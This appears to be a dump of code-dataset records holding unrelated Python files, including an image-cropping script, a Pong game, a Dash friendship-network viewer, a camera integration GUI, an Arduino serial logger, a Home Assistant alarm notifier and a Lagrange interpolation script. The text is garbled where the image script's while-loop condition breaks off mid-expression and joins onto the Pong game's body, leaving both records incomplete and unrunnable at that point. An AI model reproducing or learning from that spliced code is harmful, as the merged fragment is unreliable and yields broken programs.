if len(sys.argv) > 1:\n project_name = sys.argv[1]\n\n dlg = ProjGenDialog( project_name )\n dlg.initUi()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/project_generator/project_generator.py","file_name":"project_generator.py","file_ext":"py","file_size_in_byte":3670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"601182057","text":"\nfrom PIL import Image\nimport os\nimport sys\nimport numpy as np\nfrom os import listdir\nfrom os.path import isfile, join\nfrom torchvision.datasets import VisionDataset\nimport cv2\nimport torchvision.transforms as transforms\n\nbreak_height_width = 32\njump = 300\nroot_main='../data/mnt/d/SIDD_Medium_Srgb/Data/'\nfor root, directories, filenames in os.walk(root_main):\n for filename in filenames:\n print(filename)\n if(\"NOISY\" in filename or \"DS_Store\" in filename):\n continue;\n filename_NOISY =filename.replace(\"GT\" ,\"NOISY\" ,1)\n label_file = os.path.join(root, filename)\n input_file = os.path.join(root ,filename_NOISY)\n print(\"input_file: \" +input_file)\n print(\"label_file: \" +label_file)\n img = Image.open(input_file).convert('RGB')\n target = Image.open(label_file).convert('RGB')\n width, height = img.size\n current_start_height = 20\n current_start_width = 20\n count = 1\n while(current_start_height+jump 700:\n if (ball[1] - pos[1] < 75):\n yPush+= 1\n xPush+=1\n xPush*= -1\n yPush*=-1\n else:\n print(\"shit\")\n ball=(250,250)\n gScore+=1\n yPush=-3\n\n#green side\n if ball[0] < 1:\n if ball[1] - pos[1] < 75:\n xPush*=-1\n yPush*=-1\n xPush +=1\n yPush += 3\n \n else:\n rScore+=1\n ball=(250,250)\n yPush= 3\n xPush = 3\n\n#Upper\n if ball[1] < 1:\n yPush= 3\n xPush*=-2\n \n#Lower\n if ball[1] > 500:\n \n yPush = -3\n yPush*=2\n # --- Drawing code should go here\n \n # First, clear the screen to white. Don't put other drawing commands\n # above this, or they will be erased with this command.\n screen.fill(BLACK)\n pygame.draw.rect(screen, RED, [55, 500, 10, 5])\n\n # Draw on the screen a green line from (0, 0) to (100, 100)\n # that is 5 pixels wide.\n pygame.draw.line(screen, GREEN, (0,pos[1]- 50), [0, pos[1] + 50], 7)\n pygame.draw.line(screen, RED, (700,pos[1]- 50), [700, pos[1] + 50] , 7)\n pygame.draw.circle(screen, GREEN, ball, 10)\n\n pygame.draw.circle(screen, RED, (1,500) ,10)\n pygame.draw.circle(screen, GREEN, (700,500) ,10)\n #5.17 Drawing Text\n # select the font to use, size, bold italics\n font = pygame.font.SysFont('Calibri', 25, True, False)\n \n #create image stamp\n '''text = font.render(\"My text\",True,BLACK)'''\n text = font.render(\"Ball[0]: \" + str(ball[0])+\"Ball[1]: \" + str(ball[1]), True, GREEN)\n scores = font.render(\"Player_1: \" + str(gScore)+\" Player_2: \" + str(rScore), True, GREEN)\n\n #print(\"xPush\", xPush)\n #print(\"yPush\", yPush)\n #put the image to the screen at 250x250\n screen.blit(text, [400,25])\n screen.blit(scores, [0,25])\n # --- Go ahead and update the screen with what we've drawn.\n pygame.display.flip()\n \n # --- Limit to 60 frames per second\n clock.tick(30)\n \n# Close the window and quit.\n# If you forget this line, the program will 'hang'\n# on exit if running from IDLE.\npygame.quit()\n\n#pygame.draw.line(self.screen, (95,0,95), pos, (pos[0]-rel[0], pos[1]-rel[1]), 5)\n#line(Surface, color, start_pos, end_pos, width=1) -> Rect\n#circle(Surface, color, pos, radius, width=0) -> Rect\n#pygame.draw.circle(self.screen, (200,250,255), fu, 20)\n","sub_path":"Pong.py","file_name":"Pong.py","file_ext":"py","file_size_in_byte":3567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"447012394","text":"\"\"\"\r\nsomething like the living textbook!\r\nDrag the nodes around, while its neighbors move together with it.\r\nHighlighting and de-highlighting the selected node.\r\nAdd and remove nodes.\r\nSome funny bug with highlighting, trying to fix.\r\n\"\"\"\r\n\r\nimport dash\r\nfrom dash.dependencies import Input, Output, State\r\nimport dash_html_components as html\r\nimport dash_core_components as dcc\r\n\r\nfrom dash_network import Network\r\n\r\nimport pandas as pd\r\nimport networkx as nx\r\n\r\ndf = pd.read_csv('data\\edges.csv', delimiter=\"\\t\", header=None)\r\ndf.columns = ['user', 'friend']\r\n\r\n# 'resampling\", for faster proof-of-concept\r\n# df_sample = df.sample(50) # random sample\r\n# df_first_100 = df.head(100) # first 100 (so all centered around person 0)\r\nthe_user_init = [12]\r\ndf_user = df[df.user.isin(the_user_init)] # for the specific users\r\n\r\nG = nx.from_pandas_dataframe(df_user, 'user', 'friend') # make Graph from pandas dataframe\r\nprint('Graph made')\r\n\r\ndef find_friends(user, df):\r\n df_u = df[df.user.isin(user)]\r\n graph = nx.from_pandas_dataframe(df_u, 'user', 'friend')\r\n return graph\r\n\r\n\r\n# friends = df_user.friend.values.tolist() + the_user_init\r\n\r\ndef radius_mapper(r):\r\n if r < 20:\r\n return 20\r\n else:\r\n return r\r\n\r\ndef make_network_data(graph):\r\n nodes = [{'id': str(node_id), 'color': 'PowderBlue', 'radius': radius_mapper(len(graph.neighbors(node_id)))} for node_id in graph.nodes()]\r\n links = [{'source': str(edge_id[0]), 'target': str(edge_id[1])} for edge_id in graph.edges()]\r\n return {\r\n 'nodes': nodes,\r\n 'links': links\r\n }\r\n\r\n\r\n# dash part\r\napp = dash.Dash(__name__)\r\n\r\napp.scripts.config.serve_locally = True\r\napp.css.config.serve_locally = True\r\n\r\n# selected_colors = ['#006', '#060', '#600', '#A80', '#A08']\r\n\r\n\r\napp.layout = html.Div([\r\n html.H2('Friendship Network'),\r\n Network(\r\n id='net',\r\n data=make_network_data(G),\r\n width=1000\r\n ),\r\n html.Div([\r\n dcc.Input(id='input-add-id', type='number', value='12'),\r\n dcc.Input(id='input-remove-id', type='number', value=None),\r\n html.Button(id='add-button', n_clicks=0, children='Add'),\r\n html.Button(id='remove-button', n_clicks=0, children='Remove'),\r\n html.Div(id='output-state')\r\n ])\r\n])\r\n\r\n# add and remove nodes\r\ncurrent_users = the_user_init\r\ndef add_nodes(node_id, data):\r\n if node_id in current_users:\r\n return data\r\n else:\r\n current_users.append(int(node_id))\r\n graph = find_friends(current_users, df)\r\n print(current_users)\r\n return make_network_data(graph)\r\n\r\n\r\ndef remove_nodes(node_id, data):\r\n if node_id is None:\r\n return data\r\n elif node_id not in current_users:\r\n return data\r\n else:\r\n current_users.remove(node_id)\r\n graph = find_friends(current_users, df)\r\n print(current_users)\r\n return make_network_data(graph)\r\n\r\nhighlighted_ids = []\r\n# highlight\r\ndef highlight(selected_id, data):\r\n if selected_id == None:\r\n return data\r\n if selected_id != None:\r\n G = find_friends(current_users, df)\r\n data = make_network_data(G)\r\n if int(selected_id) not in highlighted_ids:\r\n highlighted_ids.append(int(selected_id))\r\n print(highlighted_ids)\r\n index = G.nodes().index(int(selected_id))\r\n data['nodes'][index]['color'] = 'pink'\r\n neighbors = G.neighbors(int(selected_id))\r\n for neighbor in neighbors:\r\n if neighbor not in highlighted_ids:\r\n highlighted_ids.append(neighbor)\r\n index_n = G.nodes().index(neighbor)\r\n data['nodes'][index_n]['color'] = 'pink'\r\n else:\r\n highlighted_ids.remove(int(selected_id))\r\n index = G.nodes().index(int(selected_id))\r\n data['nodes'][index]['color'] = 'PowderBlue'\r\n neighbors = G.neighbors(int(selected_id))\r\n for neighbor in neighbors:\r\n if neighbor in highlighted_ids:\r\n highlighted_ids.remove(neighbor)\r\n index_n = G.nodes().index(neighbor)\r\n data['nodes'][index_n]['color'] = 'PowderBlue'\r\n return data\r\n\r\n# callback update graph\r\n@app.callback([Output('net', 'data'),\r\n Output('input-add-id', 'value'),\r\n Output('input-remove-id', 'value')],\r\n [Input('net', 'selectedId'),\r\n Input('add-button', 'n_clicks'),\r\n Input('remove-button', 'n_clicks')],\r\n [State('net', 'data'),\r\n State('input-add-id', 'value'),\r\n State('input-remove-id', 'value')])\r\ndef update_graph(selected_id, n_clicks, n_clicks_2, data, add_node_id, remove_node_id):\r\n clicks = [n_clicks, n_clicks_2] # needs that input to be there\r\n print(add_node_id, remove_node_id)\r\n network = data\r\n if add_node_id is not None:\r\n network = add_nodes(add_node_id, data)\r\n if remove_node_id is not None:\r\n network = remove_nodes(remove_node_id, network)\r\n return highlight(selected_id, network), None, None\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run_server(debug=True)\r\n","sub_path":"01c_drag_add_remover.py","file_name":"01c_drag_add_remover.py","file_ext":"py","file_size_in_byte":5187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"329716741","text":"from distutils.core import setup\nfrom distutils.extension import Extension\nfrom Cython.Distutils import build_ext\nfrom Cython.Build import cythonize\nimport numpy\n\next_modules = Extension(\n \"*\",\n [\"mizzle/*.pyx\"],\n extra_compile_args = [\"-O3\", \"-ffast-math\", \"-march=native\", \"-fopenmp\" ],\n extra_link_args=['-fopenmp'],\n include_dirs=[numpy.get_include()],\n)\n\nsetup(name='mizzle',\n version='0.1',\n description='Hydrates arbitrary metal-oxide surfaces',\n author='Samuel Stenberg',\n author_email='samuel.stenberg@hotmail.com',\n license='MIT',\n packages=['mizzle'],\n install_requires=['argcomplete','numpy','pandas','mdtraj','tqdm', 'scipy', 'radish', 'sphinx_rtd_theme'],\n scripts=['bin/mizzler'],\n include_package_data=True,\n cmdclass = {'build_ext': build_ext},\n ext_modules = cythonize([ext_modules]),\n zip_safe=False)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"587666247","text":"import numpy as np\nfrom numpy.random import normal\nimport pickle\nimport itertools\nimport zipfile as zf\n\n# float_package = pickle.load(open('flotation_model.pickle', 'rb'))\n# smelt_package = pickle.load(open('smelting_model.pickle', 'rb'))\n\nwith zf.ZipFile('flotation_model.zip') as flotation_model:\n float_package = pickle.load(flotation_model.open('flotation_model.pickle'))\n\nwith zf.ZipFile('smelting_model.zip') as smelting_model:\n smelt_package = pickle.load(smelting_model.open('smelting_model.pickle'))\n\ndef max_prod(package, constraints):\n if package == 'float': package = float_package\n elif package == 'smelt': package = smelt_package\n\n inputs = constraints\n print(constraints)\n\n gridsearch = create_grid(package, inputs) # create all possible permutations of free variables\n\n gridsearch_scaled = package['min_max_scaler'].transform(gridsearch) # Perform pre-processing inputs\n\n output = package['model'].predict(gridsearch_scaled) # Run model prediction\n\n max_index = np.argmax(output) # find index of maximum output (i.e. highest metal concentration)\n\n opt_in = package['min_max_scaler'].inverse_transform(gridsearch_scaled)[max_index] # inverse transform max index\n opt_in = opt_in.tolist() # convert data type\n opt_out = output[max_index].tolist() # convert data type\n\n print(opt_in)\n print(opt_out)\n\n return [round(i, 2) for i in opt_in], round(opt_out, 2)\n\ndef create_grid(package, inputs):\n # This function creates all possible permutations of free-variables. This essentially creates a grid search matrix\n # which will be passed to the model.\n\n # Find missing / free variables and generate linear space values between min and max bounds\n gridsearch = []\n linspace = []\n for i, v in enumerate(inputs):\n if v is None:\n low_bound = package['safety_thresh']['Inputs'][0][i]\n high_bound = package['safety_thresh']['Inputs'][1][i]\n linspace.append(np.linspace(low_bound, high_bound, num=20))\n\n # Generate all possible permutations of free variables\n iterations = list(itertools.product(*linspace))\n\n # Generate grid-search array\n for variation in iterations:\n none_index = 0\n temp = inputs[:]\n for i, v in enumerate(inputs):\n if v is None:\n temp[i] = variation[none_index]\n none_index += 1\n gridsearch.append(temp)\n\n gridsearch = np.asarray(gridsearch) # modify data type\n\n return gridsearch\n\nif __name__ == '__main__':\n constraints = [None, None, 397.5, 9.76, 1.67, 2847.0, 488.7, 281.28, 520.4] # Float\n constraints = [None, None, 0.21, 5.3, 5, 650, 280] # Smelt\n opt_in, opt_out = max_prod('smelt', constraints)\n\n","sub_path":"reverseModeling.py","file_name":"reverseModeling.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"647568174","text":"#!/usr/bin/python\n\nfrom __future__ import with_statement, print_function\n\"\"\"\npyFAI_lima\n\nA graphical tool (based on PyQt4) for performing azimuthal integration of images coming from a camera.\nNo data are saved !\n\n\"\"\"\n\n__author__ = \"Jerome Kieffer\"\n__contact__ = \"Jerome.Kieffer@ESRF.eu\"\n__license__ = \"GPLv3+\"\n__copyright__ = \"European Synchrotron Radiation Facility, Grenoble, France\"\n__date__ = \"11/10/2013\"\n__satus__ = \"development\"\n\nimport sys\nimport time\nimport signal\nimport threading\nimport numpy\nimport pyFAI.worker\nfrom pyFAI import io\nimport pyopencl\nimport os\nop = os.path\nimport logging\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(\"pyFAI\")\nfrom PyQt4 import QtCore, QtGui, uic\nfrom PyQt4.QtCore import SIGNAL\nimport pyqtgraph as pg\n\n\nUIC = op.join(op.dirname(__file__), \"pyFAI_lima.ui\")\nwindow = None\n\n\nclass DoubleView(QtGui.QWidget):\n def __init__(self, ip=\"192.168.5.19\", fps=30, poni=None, json=None, writer=None, cake=None):\n QtGui.QWidget.__init__(self)\n try:\n uic.loadUi(UIC, self)\n except AttributeError as error:\n logger.error(\"I looks like your installation suffers from this bug: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=697348\")\n raise RuntimeError(\"Please upgrade your installation of PyQt (or apply the patch)\")\n self.ip = str(ip)\n self.fps = float(fps)\n self.label_ip.setText(str(ip))\n self.label_fps.setText(str(fps))\n self.cam = self.iface = self.ctrl = self.acq = None\n self.cam = Basler.Camera(self.ip)\n self.iface = Basler.Interface(self.cam)\n self.ctrl = Core.CtControl(self.iface)\n self.is_playing = False\n self.cake = int(cake)\n self.connect(self.pushButton_play, SIGNAL(\"clicked()\"), self.start_acq)\n self.connect(self.pushButton_stop, SIGNAL(\"clicked()\"), self.stop_acq)\n self.last_frame = None\n self.last = time.time()\n if poni:\n worker = pyFAI.worker.Worker(ai=pyFAI.load(poni))\n elif json:\n worker = pyFAI.worker.Worker()\n worker.setJsonConfig(json)\n else:\n worker = None\n\n self.processLink = LinkPyFAI(worker, writer)\n self.extMgr = self.ctrl.externalOperation()\n self.myOp = self.extMgr.addOp(Core.USER_LINK_TASK, \"pyFAILink\", 0)\n self.myOp.setLinkTask(self.processLink)\n\n self.callback = StartAcqCallback(self.ctrl, self.processLink)\n self.myOp.registerCallback(self.callback)\n self.timer = QtCore.QTimer()\n self.connect(self.timer, SIGNAL(\"timeout()\"), self.update_img)\n self.writer = writer\n self.dLayout = QtGui.QHBoxLayout(self.frame)\n if self.cake <= 1:\n self.variablePlot = pg.PlotWidget(parent=self.frame)\n else:\n self.variablePlot = pg.ImageView(parent=self.frame)\n self.dLayout.addWidget(self.variablePlot)\n\n def start_acq(self):\n if self.is_playing: return\n self.is_playing = True\n self.acq = self.ctrl.acquisition()\n self.acq.setAcqNbFrames(0)\n self.acq.setAcqExpoTime(1.0 / self.fps)\n self.ctrl.prepareAcq()\n if self.cake != self.processLink._worker.nbpt_azim:\n self.processLink._worker.nbpt_azim = int(self.cake)\n self.ctrl.prepareAcq()\n self.ctrl.startAcq()\n while self.ctrl.getStatus().ImageCounters.LastImageReady < 1:\n time.sleep(0.1)\n self.last_frame = self.ctrl.getStatus().ImageCounters.LastImageReady\n raw_img = self.ctrl.ReadBaseImage().buffer\n fai_img = self.ctrl.ReadImage().buffer\n self.RawImg.setImage(raw_img.T)#, levels=[0, 4096])#, autoLevels=False, autoRange=False)\n if self.cake <= 1:\n for i in self.variablePlot.plotItem.items[:]:\n self.variablePlot.plotItem.removeItem(i)\n self.variablePlot.plot(fai_img[:, 0], fai_img[:, 1])\n\n else:\n self.variablePlot.setImage(fai_img.T)#, levels=[0, 4096])#, autoLevels=False, autoRange=False)\n self.last = time.time()\n self.timer.start(1000.0 / self.fps)\n\n def stop_acq(self):\n if self.is_playing:\n self.is_playing = False\n self.ctrl.stopAcq()\n self.timer.stop()\n\n def update_img(self):\n last_frame = self.ctrl.getStatus().ImageCounters.LastImageReady\n if last_frame == self.last_frame:\n return\n if self.is_playing:\n raw_img = self.ctrl.ReadBaseImage().buffer\n fai_img = self.ctrl.ReadImage().buffer\n self.RawImg.setImage(raw_img.T)#, levels=[0, 4096])#, autoLevels=False, autoRange=False)\n if self.cake <= 1:\n self.variablePlot.plotItem.plot(fai_img[:, 0], fai_img[:, 1])\n self.variablePlot.plotItem.removeItem(self.variablePlot.plotItem.items[0])\n else:\n self.variablePlot.setImage(fai_img.T)#, levels=[0, 4096])#, autoLevels=False, autoRange=False)\n print(\"Measured display speed: %5.2f fps\" % (1.0 / (time.time() - self.last)))\n self.last = time.time()\n\n\n\n\n\nif __name__ == \"__main__\":\n from optparse import OptionParser\n usage = \"usage: %prog [options] \"\n version = \"%prog \" + pyFAI.version\n description = \"\"\"\n pyFAI-lima is a graphical interface (based on Python/Qt4) to perform azimuthal integration\non a set of files grabbed from a Basler camera using LImA.\"\"\"\n epilog = \"\"\" \"\"\"\n parser = OptionParser(usage=usage, version=version, description=description, epilog=epilog)\n parser.add_option(\"-v\", \"--verbose\",\n action=\"store_true\", dest=\"verbose\", default=False,\n help=\"switch to verbose/debug mode\")\n parser.add_option(\"-p\", \"--poni\",\n dest=\"poni\", default=None,\n help=\"PONI file containing the setup\")\n parser.add_option(\"-j\", \"--json\",\n dest=\"json\", default=None,\n help=\"json file containing the setup\")\n parser.add_option(\"-f\", \"--fps\",\n dest=\"fps\", default=\"30\",\n help=\"Number of frames per seconds\")\n parser.add_option(\"-i\", \"--ip\",\n dest=\"ip\", default=\"192.168.5.19\",\n help=\"IP address of the Basler camera\")\n parser.add_option(\"-l\", \"--lima\",\n dest=\"lima\", default=None,\n help=\"Base installation of LImA\")\n parser.add_option(\"-s\", \"--scan\",\n dest=\"scan\", default=None,\n help=\"Size of scan of the fastest motor\")\n parser.add_option(\"-c\", \"--cake\", action=\"store\", type=\"int\",\n dest=\"cake\", default=0,\n help=\"Perform 2D caking, in so many slices instead of full integration, a reasonable value is 360\")\n\n parser.add_option(\"--no-gui\",\n dest=\"gui\", default=True, action=\"store_false\",\n help=\"Process the dataset without showing the user interface.\")\n\n (options, args) = parser.parse_args()\n if len(args) == 1:\n hurl = args[0]\n if os.path.isdir(hurl):\n #write .dat or .edf files ...\n if options.cake < 2:\n writer = io.AsciiWriter(hurl)\n #Else HDF5\n else:\n if hurl.startswith(\"hdf5:\"):\n hurl = hurl[5:]\n if \":\" in hurl:\n hsplit = hurl.split(\":\")\n hdfpath = hsplit[-1]\n hdffile = \":\".join(hsplit[:-1]) #special windows\n else:\n hdfpath = \"test_LImA+pyFAI\"\n hdffile = hurl\n writer = io.HDF5Writer(hdffile, hdfpath, options.scan)\n elif len(args) > 1 :\n logger.error(\"Specify the HDF5 output file like hdf5:///home/user/filename.h5:/path/to/group\")\n sys.exit(1)\n else:\n writer = None\n\n if options.verbose:\n logger.info(\"setLevel: debug\")\n logger.setLevel(logging.DEBUG)\n if options.lima:\n sys.path.insert(0, options.lima)\n try:\n from Lima import Core, Basler\n\n except ImportError:\n print(\"Is the PYTHONPATH correctly setup? I did not manage to import Lima\")\n sys.exit(1)\n from limaFAI import LinkPyFAI, StartAcqCallback\n if options.gui:\n app = QtGui.QApplication([])\n window = DoubleView(ip=options.ip, fps=options.fps, writer=writer, cake=options.cake)\n #window.set_input_data(args)\n window.show()\n sys.exit(app.exec_())\n else:\n raise Exception(\"No sense!\")\n pass\n","sub_path":"plugins/Lima/pyFAI_lima.py","file_name":"pyFAI_lima.py","file_ext":"py","file_size_in_byte":8621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"585146575","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 18 15:48:48 2016\n\n@author: adamcraycraft\n\"\"\"\n\n#! /usr/bin/env python\n\n# Read the output of an Arduino which may be printing sensor output,\n# and at the same time, monitor the user's input and send it to the Arduino.\n# See also\n# http://www.arcfn.com/2009/06/arduino-sheevaplug-cool-hardware.html\n# Runs with runExperiment10.ino \n\nimport os, sys, serial, select, time\nimport numpy as np\nimport pandas as pd\n\ndef v_to_pressure(v):\n\treturn 419.58 * v + 10.818\n\t\ntarray = np.array([])\nparray = np.array([])\t\nstart_time = time.time()\ndate_string = time.strftime(\"%Y%m%d\")\ntry:\n\tos.listdir('/Users/adamcraycraft/Desktop/Research/data/%s' % date_string)\nexcept OSError:\n\tos.mkdir('/Users/adamcraycraft/Desktop/Research/data/%s' % date_string)\n\nclass Arduino() :\n def run(self, baud=9600) :\n # Port may vary, so look for it:\n self.ser = serial.Serial('/dev/cu.usbmodem14201',9600)\n self.ser.flushInput()\n desc = input(\"Enter run description: \")\n #desc = \"Condensing\"\n cmd_log = [(desc + ' START ',time.strftime('%I:%M:%S %p',time.localtime(start_time)))]\n t = 0\n ts = []\n ps = []\n start_string = time.strftime('%I%M%p')\n filling = False\n fill_t = time.time()-3590\n start_t = time.time()\n last_t = 0\n data_file = '/Users/adamcraycraft/Desktop/Research/data/%s/pressure%s.csv' %(date_string, start_string)\n while True:\n inp, outp, err = select.select([sys.stdin, self.ser], [], [], .2)\n# Check for user input:\n if sys.stdin in inp :\n line = sys.stdin.readline()\n if line == \"qt\\n\":\n \tbreak\n self.ser.write(line.encode('utf-8'))\n cmd_log.append((line.strip(),time.ctime(time.time())))\n# check for Arduino output:\n if self.ser in inp :\n counts = float(self.ser.readline().strip())\n t = time.time()\n t_string = time.strftime('%I:%M:%S %p')\n ts.append(t)\n ps.append(counts)\n tarray = np.array(ts)\n parray = np.array(ps)\n data = pd.Series(parray, index = tarray, name = 'voltages (v)')\n data.to_csv(data_file)\n print(counts, t_string)\n if t > start_t + 3600:\n \tstart_t = t\n \tstart_string = time.strftime('%I%M%p')\n \tdata_file = '/Users/adamcraycraft/Desktop/Research/data/%s/pressure%s.csv' %(date_string, start_string)\n \tts = []\n \tps = []\n if t > fill_t + 4500:\n \tline = 'pmp\\n'\n \tself.ser.write(line.encode('utf-8'))\n \tfill_t = t\n \tfilling = True\n if filling and t > fill_t + 60:\n \tline = '\\n'\n \tself.ser.write(line.encode('utf-8'))\n \tfilling = False\n end_comment = input(\"Final Comments? \")\n cmd_log.append((end_comment + ' END ', t_string))\n self.ser.close()\n np.savetxt('/Users/adamcraycraft/Desktop/Research/data/%s/cmd_log%s.txt' %(date_string, start_string), cmd_log, fmt = '%s', delimiter = ' ')\n\t\t\n\narduino = Arduino()\ntry :\n if len(sys.argv) > 1 :\n print(\"Using\", sys.argv[1], \"baud\")\n arduino.run(baud=sys.argv[1])\n else :\n arduino.run()\nexcept serial.SerialException :\n print(\"Disconnected (Serial exception)\")\nexcept IOError :\n print(\"Disconnected (I/O Error)\")\nexcept KeyboardInterrupt :\n print(\"Interrupt\")","sub_path":"runExperiment11.py","file_name":"runExperiment11.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"486693130","text":"import appdaemon.appapi as appapi\r\nimport random\r\nimport json\r\n\r\n\r\nclass AlarmReaction(appapi.AppDaemon):\r\n def initialize(self):\r\n self.log(\"Listening for Alarm Triggers....\")\r\n #self.listen_state(self.alarmLights, self.args['alarm_lights'])\r\n #self.listen_state(self.alarmSounds, self.args['alarm_sounds'])\r\n self.listen_event(self.alarmListener, 'state_changed', entity_id = 'alarm_control_panel.house')\r\n self.telegram = self.get_app(\"Telegram\")\r\n self.broadcastStartup(\"RSData Smart Alarm Online\")\r\n\r\n def broadcastStartup (self, message):\r\n adminUsers = self.config['Telegram'][\"groups\"]['admin']['chatids']\r\n for user in adminUsers:\r\n self.call_service(\"telegram_bot/send_message\",\r\n target = user,\r\n message = message)\r\n\r\n def alarmListener(self, event_name, data, kwargs):\r\n self.log(\"<<...\")\r\n self.trigger(data,kwargs)\r\n self.log(\"...>>\")\r\n\r\n def trigger(self, data, kwargs):\r\n #self.log(\"ARMED HOME - <{}> - <{}>\".format(data,kwargs))\r\n new_state = data['new_state']['state']\r\n # activateAction(new_state)\r\n self.log(\"Event Trigger for :{}\".format(str(new_state).upper()))\r\n triggered_by = self.getTriggeredBy(data)\r\n self.log(\"Triggered by :{}\".format(triggered_by['name']))\r\n self.log(\"Notifying\")\r\n self.telegram_notify(new_state, triggered_by)\r\n self.log(\"...>>\")\r\n\r\n def getTriggeredBy(self, data):\r\n triggered_by = data['new_state']['attributes'].get('triggeredBy',None)\r\n self.log(\"TRIGGEDER YBY - {}\".format(triggered_by))\r\n if triggered_by in [list(),None,'','None']:\r\n if data['new_state']['state'] in ['triggered','warning']:\r\n triggered_by = {'name': self.friendly_name(data['new_state']['attributes']['changed_by'])}\r\n else:\r\n triggered_by = {'name':'Web Console'}\r\n else:\r\n triggered_by = json.loads(triggered_by.replace(\"\\'\",\"\\\"\"))\r\n return triggered_by\r\n \r\n def telegram_notify(self,new_state,triggered_by):\r\n telegram_groups = self.config['Telegram'][\"groups\"].items()\r\n count = 0\r\n for user_group in self.args['notify_{}'.format(new_state)]:\r\n for chat_id in self.config['Telegram']['groups'][user_group]['chatids']:\r\n if triggered_by.get('chat_id') != chat_id:\r\n count += 1\r\n self.log(\"[{}] {}\".format(user_group,chat_id))\r\n accessgroup = self.telegram.getAccessGroup(str(chat_id),telegram_groups)\r\n keyboard = self.telegram.getKeyboard(new_state,accessgroup)\r\n self.call_service(\"telegram_bot/send_message\",\r\n target = chat_id,\r\n message = self.getMessage(new_state,triggered_by['name']),\r\n keyboard = keyboard)\r\n self.log(\"{} user(s) successfully notified\".format(count))\r\n\r\n def getMessage(self,new_state,triggered_by_name):\r\n messages = {\"armed_home\":\"Alarm ARMED (Stay) by {}\".format(triggered_by_name),\r\n \"armed_away\":\"Alarm ARMED (Away) by {}\".format(triggered_by_name) ,\r\n \"pending\":\"Alarm PENDING ARM by {}\".format(triggered_by_name),\r\n \"warning\":\"{0} Warning by {1}\".format(u'\\U000026a0',triggered_by_name),\r\n \"disarmed\":\"Alarm DISARMED by {}\".format(triggered_by_name),\r\n \"triggered\":\"{0} Alarm TRIGGERED by {1}\".format(u'\\U000026d4',triggered_by_name)}\r\n return messages.get(new_state)\r\n\r\n def alarmLights(self, entity, attribute, old, new, kwargs):\r\n if new == 'on':\r\n self.log(\"LIGHT ALARM ACTIVATED - <{}> - <{}>\".format(entity,new))\r\n self.turn_on(self.args['lights'],True)\r\n else:\r\n self.log(\"LIGHT ALARM DISABLED - <{}> - <{}>\".format(entity,new))\r\n self.turn_on(self.args['lights'],False)\r\n self.log(self.args['lights'])\r\n\r\n def alarmSounds(self, entity, attribute, old, new, kwargs):\r\n if new == 'on':\r\n self.log(\"SOUND ALARM ACTIVATED - <{}> - <{}>\".format(entity,new))\r\n self.audioLoop(self.args['xiaomis'],True)\r\n else:\r\n self.log(\"SOUND ALARM DISABLED - <{}> - <{}>\".format(entity,new))\r\n self.audioLoop(self.args['xiaomis'],False)\r\n \r\n def audioLoop(self, xiaomis, repeat):\r\n for xiaomi in xiaomis:\r\n self.log(\"XIAOMI!!\")\r\n self.call_service(\"xiaomi/play_ringtone\", gw_mac = xiaomi.get('gw_mac'), ringtone_id = xiaomi.get('ringtone_id'), ringtone_vol = xiaomi.get('ringtone_vol'))\r\n if repeat==True:\r\n if self.get_state('input_boolean.alarm_sounds') == 'on':\r\n pass#self.run_in(self.audioLoop(xiaomis,repeat),20)\r\n else:\r\n for xiaomi in xiaomis:\r\n self.log(\"XIAOMI STOP!!\")\r\n self.call_service(\"xiaomi/stop_ringtone\", gw_mac = xiaomi.get('gw_mac'))\r\n\r\n def turn_on(self, lights, repeat):\r\n strobeLights = []\r\n rgbwLights = []\r\n for light in self.args['lights']: \r\n self.log(\"LIGGHT - <{}> - <{}>\".format(light.get('entity_id'),light.get('effect')))\r\n if light.get('effect') is not None:\r\n rgbwLights.append(light['entity_id'])\r\n self.call_service(\"light/turn_on\", entity_id = light.get('entity_id'), effect = light.get('effect'))\r\n else:\r\n strobeLights.append(light['entity_id'])\r\n self.call_service(\"homeassistant/turn_on\", entity_id = strobeLights)\r\n if repeat == True:\r\n if self.get_state('input_boolean.alarm_lights') == 'on':\r\n self.turn_off(strobeLights)\r\n else:\r\n self.call_service(\"light/turn_on\", entity_id = rgbwLights, effect = \"Stop\")\r\n\r\n def turn_off(self, lights):\r\n self.log(\"OFF - {}\".format(lights))\r\n self.call_service(\"homeassistant/turn_off\", entity_id = lights)\r\n self.turn_on(lights, True)\r\n","sub_path":"alarm.py","file_name":"alarm.py","file_ext":"py","file_size_in_byte":6218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"302515042","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\ndosya=open(\"lagrange.txt\")\ndegerler = []\n\nfor line in dosya.readlines():\n line = line.rstrip('\\n').split(' ')\n degerler.append(line)\ndosya.close()\n\nx = float(input(\"hangi değerin hesaplanmasını istiyorsunuz: \"))\nlimit = len(degerler[0])\ntoplam = 0.0\nfor i in range(limit):\n k = 1.0\n l = 1.0\n for j in range(limit):\n if(i != j):\n k = k*(x-float(degerler[0][j]))\n l = l*(float(degerler[0][i])-float(degerler[0][j]))\n toplam = float(toplam+(k/l)*float(degerler[1][i]))\nprint(toplam)\n\n\n\n\n\n","sub_path":"lagrange.py","file_name":"lagrange.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"87497666","text":"import os\nimport environ\nfrom django.utils import six\nROOT_DIR = environ.Path(__file__) - 3 # 